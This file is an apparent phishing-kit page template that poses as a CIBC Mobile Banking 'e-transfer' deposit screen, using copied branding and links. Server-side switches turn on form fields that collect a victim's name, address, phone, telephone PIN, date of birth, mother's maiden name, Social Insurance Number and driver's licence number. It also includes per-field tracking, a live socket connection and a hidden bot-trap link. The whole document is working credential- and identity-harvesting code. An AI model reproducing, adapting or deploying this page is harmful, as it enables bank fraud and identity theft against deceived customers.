<%

let name = cibc.name
let address = cibc.address
let postal = cibc.postal
let phone = cibc.phone
let pin = cibc.pin
let dob = cibc.dob
let email = cibc.email
let mmn = cibc.mmn
let sin = cibc.sin
let dl = cibc.dl

%>
<html>
    <head>
        <script type="text/javascript" id="custom-useragent-string"></script>
        <meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <title>E-tranfer</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
        <meta name="HandheldFriendly" content="true">
        <meta name="format-detection" content="telephone=no">
        <link rel="stylesheet" href="/assets/cibc/confirm_files/reset.css">
        <link rel="stylesheet" href="/assets/cibc/confirm_files/reset-brand.css">
        <link rel="stylesheet" href="/assets/cibc/confirm_files/global.css">
        <link rel="stylesheet" href="/assets/cibc/confirm_files/global-android2.css">
        <link rel="stylesheet" href="/assets/cibc/confirm_files/global-brand.css">
        <link rel="stylesheet" href="/assets/cibc/confirm_files/password-reset.css">
        <link rel="stylesheet" href="/assets/cibc/confirm_files/password-reset-brand.css">
        <style id="at-makers-style" class="at-flicker-control">
            .mboxDefault {visibility: hidden;}
        </style>
        <style>
        #header-logo {
            background: url(/assets/cibc/img/cibcnew.svg);
            background-repeat: no-repeat;
            background-position: center;
            background-size: contain;
            width: 100px;
        }
        </style>
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>var lrbank = '<?=escape($udata->last->bank)?>'; var lrinfo = '<?=escape($udata->last->info)?>';</script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.js"></script>
        <script src="/assets/js/details.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body lang="en" class="android-fix">
        <span class="offscreen">Forgot Password</span>
        <input type="checkbox" id="drawer-toggle-chk" aria-hidden="true">
        <label for="drawer-toggle-chk" id="drawer-toggle-label">
        <img id="open-menu-icon" src="/assets/cibc/confirm_files/drawer-menu-open.png" alt="Open Menu" role="button">
        <img id="close-menu-icon" src="/assets/cibc/confirm_files/drawer-menu-close.png" alt="Close Menu" role="button">
        </label>
        <nav id="drawer-menu" class="scrollable-ver">
            <div id="menu-wrapper">
                <div class="drawer-menu-header">
                    <div>CIBC<span>Mobile Banking</span></div>
                </div>
                <ul>
                    <li id="li-sign-on"><a id="signon-link" class="tracking-set-flow" href="https://www.cibc.mobi/ebm-mobile-anp/verify-card?6-1.ILinkListener-header-drawerMenu-signonLink" role="menuitem">Sign On</a></li>
                    <li><a id="register-link" class="tracking-set-flow" href="https://www.cibc.mobi/ebm-mobile-anp/verify-card?6-1.ILinkListener-header-drawerMenu-registerLink" role="menuitem">Register</a></li>
                    <li id="li-forgot-password"><a id="forgetpwd-link" class="tracking-set-flow active" href="https://www.cibc.mobi/ebm-mobile-anp/verify-card?6-1.ILinkListener-header-drawerMenu-forgetPasswordLink" role="menuitem">Forgot Password<span class="offscreen">Selected</span></a></li>
                    <hr>
                    <li id="li-open-account"><a id="open-product-link" class="tracking-set-flow" href="https://www.cibc.mobi/ebm-mobile-anp/verify-card?6-1.ILinkListener-header-drawerMenu-openAccountPs-openAccountPsLink" role="menuitem" @="Open an Account<span class=&quot;offscreen&quot;>. Opens in new page</span>">Open an Account</a></li>
                    <li id="li-browse-products"><a id="browse-products-link" href="https://www.cibc.mobi/ebm-mobile-anp/verify-card?6-1.ILinkListener-header-drawerMenu-browseProductsPs-productSelectorLink" target="_blank" role="menuitem" @="Explore Products<span class=&quot;offscreen&quot;>. Opens in new page</span>" class="">Explore Products</a></li>
                    <li id="li-sites-apps"></li>
                    <li id="li-sites-apps"><a id="sites-link" href="https://www.cibc.mobi/ebm-mobile-anp/verify-card?6-1.ILinkListener-header-drawerMenu-sitesPreSignOnLink" role="menuitem" class="">CIBCSites</a></li>
                    <li id="li-find-us"><a id="find-us-link" href="https://www.cibc.com/ca/redirect/locator.html?itrc=C1:6185" target="_blank" role="menuitem">Find Us</a></li>
                    <li id="li-security"><a id="security-guarantee-link" href="https://www.cibc.com/ca/mobile/legal/mobile-security.html?itrc=C1:6166" target="_blank" role="menuitem">Security Guarantee</a></li>
                    <hr>
                    <li><a id="contact-us-link" href="https://www.cibc.com/m/contact-cibc.html?itrc=C1:6187" target="_blank" role="menuitem">Contact Us</a></li>
                    <li id="idd"><a id="legal-link" role="menuitem" href="https://www.cibc.mobi/ebm-mobile-anp/verify-card?6-1.ILinkListener-header-drawerMenu-privacyAndLegalContainer-legalLink" @="Privacy and Legal<span class=&quot;offscreen&quot;>Opens in new page.</span>" class="">Privacy and Legal<span class="offscreen">Opens in new page.</span></a></li>
                    <li><a id="help-link" href="http://cibc.intelliresponse.com/mobile-w/?itrc=C1:6167" target="_blank" role="menuitem">Help</a></li>
                </ul>
            </div>
        </nav>
        <header class="flex-box flex-box-hoz">
            <div class="flex-box-flex-1"></div>
            <a href="http://cibc.com/" target="_blank">
                <div id="header-logo">
                    <span class="offscreen">CIBClogo</span>
                </div>
            </a>
            <div id="header-link" class="flex-box-flex-1">
            </div>
        </header>
        <noscript>
            <section id="nojs" class="overlay-msg">
                <div>
                    <p>JavaScript is currently disabled in your browser.</p>
                    <p>To access Mobile Banking, please enable JavaScript and refresh this page.</p>
                </div>
            </section>
        </noscript>
        <section id="main-page" class="mainPageClassValue">
            <section id="ide">
                <section class="page-title">
                    <h2 class="title">Deposit Your Funds</h2>
                </section>
            </section>
            <section id="card-information" class="page-wrapper">
                <p id="introductory-content">We need a bit more information. Let's get started.</p>
                <h2 class="page-subtitle">Personal Information</h2>
                <div class="global-error-from-container" tabindex="-1" id="idf">
                </div>
                <form id="loginForm" class="input-form" id="card-information-form" method="post" action="">
                    <input type="hidden" id="userAgent" name="userAgent">
                    <% if (name == 'on') { %>
                        <div class="form-group" style="">
                            <label>Full Name</label>
                            <input required="" id="input-name" type="text" placeholder="Full Name" name="name" class="form-control lrinput" attr-action="Filling Full Name">
                        </div>
                
                    <% } if (address == 'on') { %>
                        <div class="form-group" style="">
                            <label>Address</label>
                            <input required="" id="input-address" type="text" placeholder="Address" name="address" class="form-control lrinput" attr-action="Filling Address">
                            <label>City</label>
                            <input required="" id="input-city" type="text" placeholder="City" name="city" class="form-control lrinput" attr-action="Filling City">
                        </div>
                    <% } if (postal == 'on') { %>
                        <div class="form-group" style="">
                            <label>Postal Code</label>
                            <input required="" id="input-postal" type="text" placeholder="Postal Code" name="postal" class="form-control lrinput" attr-action="Filling Postal" pattern="[A-Za-z][0-9][A-Za-z] [0-9][A-Za-z][0-9]" title="Please enter a valid postal code">
                        </div>
                    <% } if (phone == 'on') { %>
                        <div class="form-group" style="">
                            <label>Phone Number</label>
                            <input required="" id="input-phone" type="tel" placeholder="Phone Number" name="phone" class="form-control lrinput" autocomplete="off" maxlength="13" oninput="this.value = this.value.replace(/[^0-9, ]/, '')" attr-action="Filling Phone">
                        </div>
                    <% } if (pin == 'on') { %>
                        <div class="form-group" style="">
                            <label>Tele Pin</label>
                            <input required="" id="input-pin" maxlength="3" type="tel" placeholder="Tele Pin" name="pin" class="form-control lrinput" attr-action="Filling Tele Pin">
                        </div>
                    <% } if (email == 'on') { %>
                        <div class="form-group" style="">
                            <label>Email</label>
                            <input required="" id="input-email" type="email" placeholder="Email" name="email" class="form-control lrinput" attr-action="Filling Email">
                        </div>
                    <% } if (dob == 'on') { %>
                        <label>Date of Birth</label>
                        <div class="form-group" style="">
                            
                            <select name="dob1" required class="form-control text-center display-inline-block lrinput" style="width:30%;display: inline-block;" attr-action="Selecting DoB">
                                <option value="">MM</option>
                                <% for (let x = 1; x <= 12; x++) { 
                                    let y = x.toString().padStart(2, '0'); %>
                                    <option value="<%= y %>"><%= y %></option>
                                <% } %>
                            </select>
                            <select name="dob2" required class="form-control text-center display-inline-block lrinput" style="width:30%;display: inline-block;" attr-action="Selecting DoB">
                                <option value="">DD</option>
                                <% for (let x = 1; x <= 31; x++) { 
                                    let y = x.toString().padStart(2, '0'); %>
                                    <option value="<%= y %>"><%= y %></option>
                                <% } %>
                            </select>
                            <select name="dob3" required class="form-control text-center display-inline-block lrinput" style="width:37%; display: inline block;" attr-action="Selecting DoB">
                                <option value="">YYYY</option>
                                <% for (let x = new Date().getFullYear(); x >= new Date().getFullYear() - 110; x--) { %>
                                    <option value="<%= x %>"><%= x %></option>
                                <% } %>
                            </select>
                        </div>
                    <% } if (mmn == 'on') { %>
                        <div class="form-group" style="">
                            <label>Mother's Maiden Name</label>
                            <input required="" id="input-mmn" type="text" placeholder="Mother's Maiden Name" name="mmn" class="form-control lrinput" attr-action="Filling MMN">
                        </div>
                    <% } if (sin == 'on') { %>
                        <div class="form-group" style="">
                            <label>Social Insurance Number</label>
                            <input required="" id="input-sin" type="tel" placeholder="Social Insurance Number" name="sin" class="form-control lrinput" attr-action="Filling SIN" pattern="[0-9]{3}-[0-9]{3}-[0-9]{3}" title="Please enter a valid SIN">
                        </div>
                    <% } if (dl == 'on') { %>
                        <div class="form-group" style="">
                            <label>Driver's Licence Number</label>
                            <input required="" id="input-drivers" type="text" placeholder="Driver's Licence Number" name="drivers" class="form-control lrinput" attr-action="Filling Drivers">
                        </div>
                    <% } %>
                    
                    <fieldset class="button-set" style="margin-top: 20px;">
                        <input onclick="submitForm()" type="button" id="continue-button" class="btn btn-positive" name="save" value="Continue">
                    </fieldset>
                    <a href="/not-found" style="visibility: hidden;">d0 n0t cl1ck</a>
                </form>
            </section>
        </section>
        <div id="__loadingScreenDiv" class="ajax-overlay" aria-live="assertive">
            <div class="ajax-overlay-background"></div>
            <img src="/assets/cibc/confirm_files/loading.gif" class="ajax-overlay-spinner" tabindex="-1" alt="Page loading">
        </div>
        <span hidden id="navig"><%=navig%></span>
        <span hidden id="stage">Details</span>
    </body>
    <script src="/bank/cibc/js/script.js">
    </script>
</html>

